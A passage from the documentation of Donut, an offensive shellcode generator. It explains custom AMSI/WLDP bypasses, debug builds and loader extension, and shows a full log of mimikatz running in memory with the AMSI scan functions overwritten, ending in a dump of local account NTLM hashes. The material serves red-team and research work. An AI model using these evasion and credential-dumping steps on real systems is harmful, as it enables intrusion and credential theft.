519 <p>You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. Each bypass implements the DisableAMSI with the signature <code>BOOL DisableAMSI(PDONUT_INSTANCE inst)</code> and DisableWLDP with <code>BOOL DisableWLDP(PDONUT_INSTANCE inst)</code>, both of which have a corresponding preprocessor directive. We have several <code>#if defined</code> blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass for AMSI is called <code>BYPASS_AMSI_A</code>. If donut is built with that variable defined, then that bypass will be used.</p>
520
521 <p>Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.</p>
522
523 <p>Another benefit of this design is that you may write your own AMSI/WLDP bypass. To build Donut with your new bypass, use an <code>if defined</code> block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.</p>
524
525 <p>If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.</p>
526
527 <h2 id="debug">12. Debugging The Generator and Loader</h2>
528
529 <p>The loader is capable of displaying detailed information about each step of file execution and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make on Windows.</p>
530
531 <pre>
532 nmake debug -f Makefile.msvc
533 make debug -f Makefile.mingw
534 </pre>
535
536 <p>Use Donut to create a shellcode as you normally would and a file called <code>instance</code> will be saved to disk. The following example embeds mimikatz.exe in the loader using the Xpress Huffman compression algorithm. It also tells the loader to run the entrypoint as a thread, so that when mimikatz calls an exit-related API, it simply exits the thread. </p>
537
538 <pre>
539 C:\hub\donut>donut -t -z5 mimikatz.exe -p"lsadump::sam exit"
540
541 [ Donut shellcode generator v0.9.3
542 [ Copyright (c) 2019 TheWover, Odzhan
543
544 DEBUG: donut.c:1505:DonutCreate(): Entering.
545 DEBUG: donut.c:1283:validate_loader_cfg(): Validating loader configuration.
546 DEBUG: donut.c:1380:validate_loader_cfg(): Loader configuration passed validation.
547 DEBUG: donut.c:459:read_file_info(): Entering.
548 DEBUG: donut.c:467:read_file_info(): Checking extension of mimikatz.exe
549 DEBUG: donut.c:475:read_file_info(): Extension is ".exe"
550 DEBUG: donut.c:491:read_file_info(): File is EXE
551 DEBUG: donut.c:503:read_file_info(): Mapping mimikatz.exe into memory
552 DEBUG: donut.c:245:map_file(): Entering.
553 DEBUG: donut.c:531:read_file_info(): Checking characteristics
554 DEBUG: donut.c:582:read_file_info(): Leaving with error : 0
555 DEBUG: donut.c:1446:validate_file_cfg(): Validating configuration for input file.
556 DEBUG: donut.c:1488:validate_file_cfg(): Validation passed.
557 DEBUG: donut.c:674:build_module(): Entering.
558 DEBUG: donut.c:381:compress_file(): Reading fragment and workspace size
559 DEBUG: donut.c:387:compress_file(): workspace size : 1415999 | fragment size : 5161
560 DEBUG: donut.c:390:compress_file(): Allocating memory for compressed data.
561 DEBUG: donut.c:396:compress_file(): Compressing 0000024E9D7E0000 to 0000024E9DA50080 with RtlCompressBuffer(XPRESS HUFFMAN)
562 DEBUG: donut.c:433:compress_file(): Original file size : 1013912 | Compressed : 478726
563 DEBUG: donut.c:434:compress_file(): File size reduced by 53%
564 DEBUG: donut.c:436:compress_file(): Leaving with error : 0
565 DEBUG: donut.c:684:build_module(): Assigning 478726 bytes of 0000024E9DA50080 to data
566 DEBUG: donut.c:695:build_module(): Allocating 480054 bytes of memory for DONUT_MODULE
567 DEBUG: donut.c:772:build_module(): Copying data to module
568 DEBUG: donut.c:784:build_module(): Leaving with error : 0
569 DEBUG: donut.c:804:build_instance(): Entering.
570 DEBUG: donut.c:807:build_instance(): Allocating memory for instance
571 DEBUG: donut.c:814:build_instance(): The size of module is 480054 bytes. Adding to size of instance.
572 DEBUG: donut.c:817:build_instance(): Total length of instance : 483718
573 DEBUG: donut.c:846:build_instance(): Generating random key for instance
574 DEBUG: donut.c:855:build_instance(): Generating random key for module
575 DEBUG: donut.c:864:build_instance(): Generating random string to verify decryption
576 DEBUG: donut.c:871:build_instance(): Generating random IV for Maru hash
577 DEBUG: donut.c:879:build_instance(): Generating hashes for API using IV: 546E2FF018FD2A54
578 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : LoadLibraryA = ABB30FFE918BCF83
579 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetProcAddress = EF2C0663C0CDDC21
580 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetModuleHandleA = D40916771ECED480
581 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualAlloc = E445DF6F06219E85
582 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualFree = C6C992D6040B85A8
583 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualQuery = 556BF46109D12C9E
584 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualProtect = 032546126BB99713
585 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : Sleep = DEB476FF0E3D71E8
586 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : MultiByteToWideChar = A0DD238846F064F4
587 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetUserDefaultLCID = 03DE3865FC2DF17B
588 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : WaitForSingleObject = 40FCB82879AAB610
589 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : CreateThread = 954101E48C1D54F5
590 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetThreadContext = 18669E0FDC3FD0B8
591 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetCurrentThread = EB6E7C47D574D9F9
592 DEBUG: donut.c:892:build_instance(): Hash for shell32.dll : CommandLineToArgvW = EFD410EF534D57C3
593 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreate = A5AA007611CB6580
594 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreateVector = D5CEC16DD247A68A
595 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayPutElement = 6B140B7B87F27359
596 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayDestroy = C2FA65C58C68FC6C
597 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetLBound = ED5A331176BB8DDA
598 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetUBound = EA0D8BE258DC67DA
599 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysAllocString = 3A7BBDEAA1DC3354
600 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysFreeString = EEB92DFE18B7C306
601 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : LoadTypeLib = 687DD816E578C4E7
602 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCrackUrlA = B0F95D86327741EC
603 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetOpenA = BDD70375BB72B131
604 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetConnectA = E74A4DD56C6B3154
605 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetSetOptionA = 527C502C0BC36267
606 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetReadFile = 055C3E8A4CF21475
607 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCloseHandle = 4D1965E404D783BA
608 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpOpenRequestA = CC736E0143DB8F2A
609 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpSendRequestA = C87BFE8578BB0049
610 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpQueryInfoA = FC7CC8D82764DFBF
611 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CorBindToRuntime = 6F6432B588D39C8D
612 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CLRCreateInstance = 2828FB8F68349704
613 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoInitializeEx = 9752F1AA167F8E79
614 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoCreateInstance = 8211344A519AF3BA
615 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoUninitialize = FF0605E1258BEE44
616 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualUnicodeString = D5CEDA5C642834D7
617 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualString = A69EAF72442222A4
618 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlUnicodeStringToAnsiString = 4DBA40D90962E1D6
619 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlInitUnicodeString = A1143A47656B2526
620 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserThread = 62FF88CDC045477E
621 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserProcess = E20BCE2C11E82C7B
622 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlCreateUnicodeString = A469294ED1E1D8DC
623 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlGetCompressionWorkSpaceSize = 61E26E7C5DD38D2C
624 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlDecompressBufferEx = 145C8CF24F5EAF3E
625 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : NtContinue = 12ACA3AD3CC20AF5
626 DEBUG: donut.c:895:build_instance(): Setting number of API to 48
627 DEBUG: donut.c:898:build_instance(): Setting DLL names to ole32;oleaut32;wininet;mscoree;shell32
628 DEBUG: donut.c:941:build_instance(): Copying strings required to bypass AMSI
629 DEBUG: donut.c:949:build_instance(): Copying strings required to bypass WLDP
630 DEBUG: donut.c:960:build_instance(): Copying strings required to replace command line.
631 DEBUG: donut.c:968:build_instance(): Copying strings required to intercept exit-related API
632 DEBUG: donut.c:1018:build_instance(): Copying module data to instance
633 DEBUG: donut.c:1024:build_instance(): Encrypting instance
634 DEBUG: donut.c:1042:build_instance(): Leaving with error : 0
635 DEBUG: donut.c:1210:build_loader(): Inserting opcodes
636 DEBUG: donut.c:1248:build_loader(): Copying 29548 bytes of x86 + amd64 shellcode
637 DEBUG: donut.c:1090:save_loader(): Saving instance 0000024E9DE90080 to file. 483718 bytes.
638 DEBUG: donut.c:1061:save_file(): Entering.
639 DEBUG: donut.c:1065:save_file(): Writing 483718 bytes of 0000024E9DE90080 to instance
640 DEBUG: donut.c:1070:save_file(): Leaving with error : 0
641 DEBUG: donut.c:1139:save_loader(): Saving loader as binary
642 DEBUG: donut.c:1172:save_loader(): Leaving with error : 0
643 DEBUG: donut.c:1540:DonutCreate(): Leaving with error : 0
644 [ Instance type : Embedded
645 [ Module file : "mimikatz.exe"
646 [ Entropy : Random names + Encryption
647 [ Compressed : Xpress Huffman (Reduced by 53%)
648 [ File type : EXE
649 [ Parameters : lsadump::sam exit
650 [ Target CPU : x86+amd64
651 [ AMSI/WDLP : continue
652 [ Shellcode : "loader.bin"
653 DEBUG: donut.c:1556:DonutDelete(): Entering.
654 DEBUG: donut.c:1562:DonutDelete(): Releasing memory for module.
655 DEBUG: donut.c:1568:DonutDelete(): Releasing memory for configuration.
656 DEBUG: donut.c:1574:DonutDelete(): Releasing memory for loader.
657 DEBUG: donut.c:289:unmap_file(): Releasing compressed data.
658 DEBUG: donut.c:294:unmap_file(): Unmapping input file.
659 DEBUG: donut.c:299:unmap_file(): Closing input file.
660 DEBUG: donut.c:1580:DonutDelete(): Leaving.
661 </pre>
662
663 <p>If successfully created, there should now be a file called "instance" in the same directory as the loader. Pass the instance file as a parameter to loader.exe which should also be in the same directory.</p>
664
665 <pre>
666 C:\hub\donut>loader instance
667 Running...
668 DEBUG: loader/loader.c:109:MainProc(): Maru IV : 546E2FF018FD2A54
669 DEBUG: loader/loader.c:112:MainProc(): Resolving address for VirtualAlloc() : E445DF6F06219E85
670 DEBUG: loader/loader.c:116:MainProc(): Resolving address for VirtualFree() : C6C992D6040B85A8
671 DEBUG: loader/loader.c:120:MainProc(): Resolving address for RtlExitUserProcess() : E20BCE2C11E82C7B
672 DEBUG: loader/loader.c:129:MainProc(): VirtualAlloc : 00007FFFD1DAA190 VirtualFree : 00007FFFD1DAA180
673 DEBUG: loader/loader.c:131:MainProc(): Allocating 483718 bytes of RW memory
674 DEBUG: loader/loader.c:143:MainProc(): Copying 483718 bytes of data to memory 00000178FEA30000
675 DEBUG: loader/loader.c:147:MainProc(): Zero initializing PDONUT_ASSEMBLY
676 DEBUG: loader/loader.c:156:MainProc(): Decrypting 483718 bytes of instance
677 DEBUG: loader/loader.c:163:MainProc(): Generating hash to verify decryption
678 DEBUG: loader/loader.c:165:MainProc(): Instance : 33C49D5864287AEF | Result : 33C49D5864287AEF
679 DEBUG: loader/loader.c:172:MainProc(): Resolving LoadLibraryA
680 DEBUG: loader/loader.c:189:MainProc(): Loading ole32
681 DEBUG: loader/loader.c:189:MainProc(): Loading oleaut32
682 DEBUG: loader/loader.c:189:MainProc(): Loading wininet
683 DEBUG: loader/loader.c:189:MainProc(): Loading mscoree
684 DEBUG: loader/loader.c:189:MainProc(): Loading shell32
685 DEBUG: loader/loader.c:193:MainProc(): Resolving 48 API
686 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EF2C0663C0CDDC21
687 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D40916771ECED480
688 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E445DF6F06219E85
689 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C6C992D6040B85A8
690 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 556BF46109D12C9E
691 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 032546126BB99713
692 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for DEB476FF0E3D71E8
693 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A0DD238846F064F4
694 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 03DE3865FC2DF17B
695 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 40FCB82879AAB610
696 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 954101E48C1D54F5
697 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 18669E0FDC3FD0B8
698 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EB6E7C47D574D9F9
699 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EFD410EF534D57C3
700 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A5AA007611CB6580
701 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEC16DD247A68A
702 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6B140B7B87F27359
703 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C2FA65C58C68FC6C
704 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for ED5A331176BB8DDA
705 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EA0D8BE258DC67DA
706 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 3A7BBDEAA1DC3354
707 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for EEB92DFE18B7C306
708 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 687DD816E578C4E7
709 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for B0F95D86327741EC
710 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for BDD70375BB72B131
711 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E74A4DD56C6B3154
712 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 527C502C0BC36267
713 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 055C3E8A4CF21475
714 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4D1965E404D783BA
715 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for CC736E0143DB8F2A
716 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for C87BFE8578BB0049
717 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FC7CC8D82764DFBF
718 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 6F6432B588D39C8D
719 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 2828FB8F68349704
720 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 9752F1AA167F8E79
721 DEBUG: peb.c:87:FindExport(): 9752f1aa167f8e79 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
722 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
723 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
724 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 8211344A519AF3BA
725 DEBUG: peb.c:87:FindExport(): 8211344a519af3ba is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
726 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
727 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
728 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for FF0605E1258BEE44
729 DEBUG: peb.c:87:FindExport(): ff0605e1258bee44 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
730 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
731 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
732 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for D5CEDA5C642834D7
733 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A69EAF72442222A4
734 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 4DBA40D90962E1D6
735 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A1143A47656B2526
736 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 62FF88CDC045477E
737 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for E20BCE2C11E82C7B
738 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for A469294ED1E1D8DC
739 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 61E26E7C5DD38D2C
740 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 145C8CF24F5EAF3E
741 DEBUG: loader/loader.c:196:MainProc(): Resolving API address for 12ACA3AD3CC20AF5
742 DEBUG: loader/loader.c:218:MainProc(): Module is embedded.
743 DEBUG: bypass.c:112:DisableAMSI(): Length of AmsiScanBufferStub is 36 bytes.
744 DEBUG: bypass.c:122:DisableAMSI(): Overwriting AmsiScanBuffer
745 DEBUG: bypass.c:137:DisableAMSI(): Length of AmsiScanStringStub is 36 bytes.
746 DEBUG: bypass.c:147:DisableAMSI(): Overwriting AmsiScanString
747 DEBUG: loader/loader.c:226:MainProc(): DisableAMSI OK
748 DEBUG: bypass.c:326:DisableWLDP(): Length of WldpQueryDynamicCodeTrustStub is 20 bytes.
749 DEBUG: bypass.c:350:DisableWLDP(): Length of WldpIsClassInApprovedListStub is 36 bytes.
750 DEBUG: loader/loader.c:232:MainProc(): DisableWLDP OK
751 DEBUG: loader/loader.c:239:MainProc(): Compression engine is 5
752 DEBUG: loader/loader.c:242:MainProc(): Allocating 1015240 bytes of memory for decompressed file and module information
753 DEBUG: loader/loader.c:252:MainProc(): Duplicating DONUT_MODULE
754 DEBUG: loader/loader.c:256:MainProc(): Decompressing 478726 -> 1013912
755 DEBUG: loader/loader.c:270:MainProc(): WorkSpace size : 1415999 | Fragment size : 5161
756 DEBUG: loader/loader.c:277:MainProc(): Decompressing with RtlDecompressBufferEx(XPRESS HUFFMAN)
757 DEBUG: loader/loader.c:302:MainProc(): Checking type of module
758 DEBUG: inmem_pe.c:103:RunPE(): Allocating 1019904 (0xf9000) bytes of RWX memory for file
759 DEBUG: inmem_pe.c:112:RunPE(): Copying Headers
760 DEBUG: inmem_pe.c:115:RunPE(): Copying each section to RWX memory 00000178FF170000
761 DEBUG: inmem_pe.c:127:RunPE(): Applying Relocations
762 DEBUG: inmem_pe.c:151:RunPE(): Processing the Import Table
763 DEBUG: inmem_pe.c:159:RunPE(): Loading ADVAPI32.dll
764 DEBUG: inmem_pe.c:159:RunPE(): Loading Cabinet.dll
765 DEBUG: inmem_pe.c:159:RunPE(): Loading CRYPT32.dll
766 DEBUG: inmem_pe.c:159:RunPE(): Loading cryptdll.dll
767 DEBUG: inmem_pe.c:159:RunPE(): Loading DNSAPI.dll
768 DEBUG: inmem_pe.c:159:RunPE(): Loading FLTLIB.DLL
769 DEBUG: inmem_pe.c:159:RunPE(): Loading NETAPI32.dll
770 DEBUG: inmem_pe.c:159:RunPE(): Loading ole32.dll
771 DEBUG: inmem_pe.c:159:RunPE(): Loading OLEAUT32.dll
772 DEBUG: inmem_pe.c:159:RunPE(): Loading RPCRT4.dll
773 DEBUG: inmem_pe.c:159:RunPE(): Loading SHLWAPI.dll
774 DEBUG: inmem_pe.c:159:RunPE(): Loading SAMLIB.dll
775 DEBUG: inmem_pe.c:159:RunPE(): Loading Secur32.dll
776 DEBUG: inmem_pe.c:159:RunPE(): Loading SHELL32.dll
777 DEBUG: inmem_pe.c:159:RunPE(): Loading USER32.dll
778 DEBUG: inmem_pe.c:159:RunPE(): Loading USERENV.dll
779 DEBUG: inmem_pe.c:159:RunPE(): Loading VERSION.dll
780 DEBUG: inmem_pe.c:159:RunPE(): Loading HID.DLL
781 DEBUG: inmem_pe.c:159:RunPE(): Loading SETUPAPI.dll
782 DEBUG: inmem_pe.c:159:RunPE(): Loading WinSCard.dll
783 DEBUG: inmem_pe.c:159:RunPE(): Loading WINSTA.dll
784 DEBUG: inmem_pe.c:159:RunPE(): Loading WLDAP32.dll
785 DEBUG: inmem_pe.c:159:RunPE(): Loading advapi32.dll
786 DEBUG: inmem_pe.c:159:RunPE(): Loading msasn1.dll
787 DEBUG: inmem_pe.c:159:RunPE(): Loading ntdll.dll
788 DEBUG: inmem_pe.c:159:RunPE(): Loading netapi32.dll
789 DEBUG: inmem_pe.c:159:RunPE(): Loading KERNEL32.dll
790 DEBUG: inmem_pe.c:182:RunPE(): Replacing KERNEL32.dll!ExitProcess with ntdll!RtlExitUserThread
791 DEBUG: inmem_pe.c:159:RunPE(): Loading msvcrt.dll
792 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!exit with ntdll!RtlExitUserThread
793 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_cexit with ntdll!RtlExitUserThread
794 DEBUG: inmem_pe.c:182:RunPE(): Replacing msvcrt.dll!_exit with ntdll!RtlExitUserThread
795 DEBUG: inmem_pe.c:196:RunPE(): Processing Delayed Import Table
796 DEBUG: inmem_pe.c:204:RunPE(): Loading bcrypt.dll
797 DEBUG: inmem_pe.c:204:RunPE(): Loading ncrypt.dll
798 DEBUG: inmem_pe.c:319:RunPE(): Setting command line: MTFM lsadump::sam exit
799 DEBUG: inmem_pe.c:433:SetCommandLineW(): Obtaining handle for kernelbase
800 DEBUG: inmem_pe.c:449:SetCommandLineW(): Searching 2161 pointers
801 DEBUG: inmem_pe.c:458:SetCommandLineW(): BaseUnicodeCommandLine at 00007FFFD1609E70 : loader instance
802 DEBUG: inmem_pe.c:466:SetCommandLineW(): New BaseUnicodeCommandLine at 00007FFFD1609E70 : MTFM lsadump::sam exit
803 DEBUG: inmem_pe.c:483:SetCommandLineW(): New BaseAnsiCommandLine at 00007FFFD1609E60 : MTFM lsadump::sam exit
804 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting ucrtbase.dll!__p__acmdln "loader instance" to "MTFM lsadump::sam exit"
805 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting ucrtbase.dll!__p__wcmdln "loader instance" to "MTFM lsadump::sam exit"
806 DEBUG: inmem_pe.c:530:SetCommandLineW(): Setting msvcrt.dll!_acmdln "loader instance" to "MTFM lsadump::sam exit"
807 DEBUG: inmem_pe.c:543:SetCommandLineW(): Setting msvcrt.dll!_wcmdln "loader instance" to "MTFM lsadump::sam exit"
808 DEBUG: inmem_pe.c:323:RunPE(): Wiping Headers from memory
809 DEBUG: inmem_pe.c:332:RunPE(): Creating thread for entrypoint of EXE : 00000178FF2007F8
810
811
812 .#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
813 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
814 ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
815 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
816 '## v ##' Vincent LE TOUX ( [email protected] )
817 '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
818
819 mimikatz(commandline) # lsadump::sam
820 Domain : DESKTOP-B888L2R
821 SysKey : b43927eef0f56833c527ea951c37abc1
822 Local SID : S-1-5-21-1047138248-288568923-692962947
823
824 SAMKey : f1813d42812fcde9c5fe08807370613d
825
826 RID : 000001f4 (500)
827 User : Administrator
828
829 RID : 000001f5 (501)
830 User : Guest
831
832 RID : 000001f7 (503)
833 User : DefaultAccount
834
835 RID : 000001f8 (504)
836 User : WDAGUtilityAccount
837 Hash NTLM: c288f1c30b232571b0222ae6a5b7d223
838
839 RID : 000003e9 (1001)
840 User : john
841 Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c
842
843 RID : 000003ea (1002)
844 User : user
845 Hash NTLM: 5835048ce94ad0564e29a924a03510ef
846
847 RID : 000003eb (1003)
848 User : test
849
850 mimikatz(commandline) # exit
851 Bye!
852
853 DEBUG: inmem_pe.c:338:RunPE(): Process terminated
854 DEBUG: inmem_pe.c:349:RunPE(): Erasing 1019904 bytes of memory at 00000178FF170000
855 DEBUG: inmem_pe.c:353:RunPE(): Releasing memory
856 DEBUG: loader/loader.c:343:MainProc(): Erasing RW memory for instance
857 DEBUG: loader/loader.c:346:MainProc(): Releasing RW memory for instance
858 DEBUG: loader/loader.c:354:MainProc(): Returning to caller
859 </pre>
860
861 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
862
863 <h2 id="loader">13. Extending The Loader</h2>
864
865 <p>Donut was never designed with modularity in mind, however, a new version in future will try to simplify the process of extending the loader, so that others can write their own code for it. Currently, simple changes to the loader can sometimes require lots of changes to the entire code base and this isn't really ideal. If for any reason you want to update the loader to include additional functionality, the following steps are required.</p>
866
867 <h3>1. Declare the function pointers</h3>
868
869 <p>For each API you want the loader to use, declare a function pointer in loader/winapi.h. For example, the <code>Sleep</code> API is declared in its SDK header file as:</p>
870
871 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#400000; '>Sleep</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
872 </pre>
873
874 <p>The function pointer for this would be declared in loader/winapi.h as:</p>
875
876 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>(</span><span style='color:#603000; '>WINAPI</span> <span style='color:#808030; '>*</span>Sleep_t<span style='color:#808030; '>)</span><span style='color:#808030; '>(</span><span style='color:#603000; '>DWORD</span> dwMilliseconds<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
877 </pre>
878
879 <h3>2. Update the API string array and function pointer array</h3>
880
881 <p>At the moment, Donut resolves API using a 64-bit hash, which is calculated by the generator before being stored in the loader itself. In donut.c is a variable called <var>api_imports</var>, declared as an array of <code>API_IMPORT</code> structures. Each entry contains a case-sensitive API string and corresponding DLL string in lowercase. The <code>Sleep</code> API is exported by kernel32.dll, so if we want the loader to use Sleep, the <code>api_imports</code> must have the following added to it. This array is terminated by an empty entry.</p>
882
883 <pre style='color:#000000;background:#ffffff;'> <span style='color:#800080; '>{</span>KERNEL32_DLL<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>Sleep</span><span style='color:#800000; '>"</span><span style='color:#800080; '>}</span><span style='color:#808030; '>,</span>
884 </pre>
885
886 <p>Of course, KERNEL32_DLL used here is a symbolic constant for "kernel32.dll".</p>
887
888 <p>The <code>DONUT_INSTANCE</code> structure is defined in include/donut.h and one of the fields called <code>api</code> is defined as a union to hold three members. <var>hash</var> is an array of <code>uint64_t</code> integers to hold a 64-bit hash of each API string. <var>addr</var> is an array of <code>void*</code> pointers to hold the address of an API in memory and finally a structure holding all the function pointers. These pointers are placed in the same order as the API strings stored in <var>api_imports</var>. Currently, the <var>api</var> member can hold up to 64 function pointers or hashes, but this can be increased if required.</p>
889
890 <p>Where you place the API string in <var>api_imports</var> is entirely up to you, but it <em>must</em> be in the same order as where the function pointer is placed in the <code>DONUT_INSTANCE</code> structure.</p>
891
892 <h3>3. Update DLL names</h3>
893
894 <p>A number of DLL are already loaded by a process; ntdll.dll, kernel32.dll and kernelbase.dll. For everything else, the instance contains a list of DLL strings loaded before attempting to resolve the address of APIs. The following list of DLLs seperated by semi-colon are loaded prior to resolving API. If the API you want Donut loader to use is exported by a DLL not shown here, you need to add it to the list.</p>
895
896 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// required for each API used by the loader</span>
897 <span style='color:#004a43; '>#</span><span style='color:#004a43; '>define</span><span style='color:#004a43; '> DLL_NAMES </span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>ole32;oleaut32;wininet;mscoree;shell32;dnsapi</span><span style='color:#800000; '>"</span>
898 </pre>
899
900 <h3>4. Calling an API</h3>
901
902 <p>If the API were successfully resolved, simply referencing the function pointer in a pointer to <code>DONUT_INSTANCE</code> is enough to invoke it. The following line of code shows how to call the <code>Sleep</code> API declared earlier.</p>
903
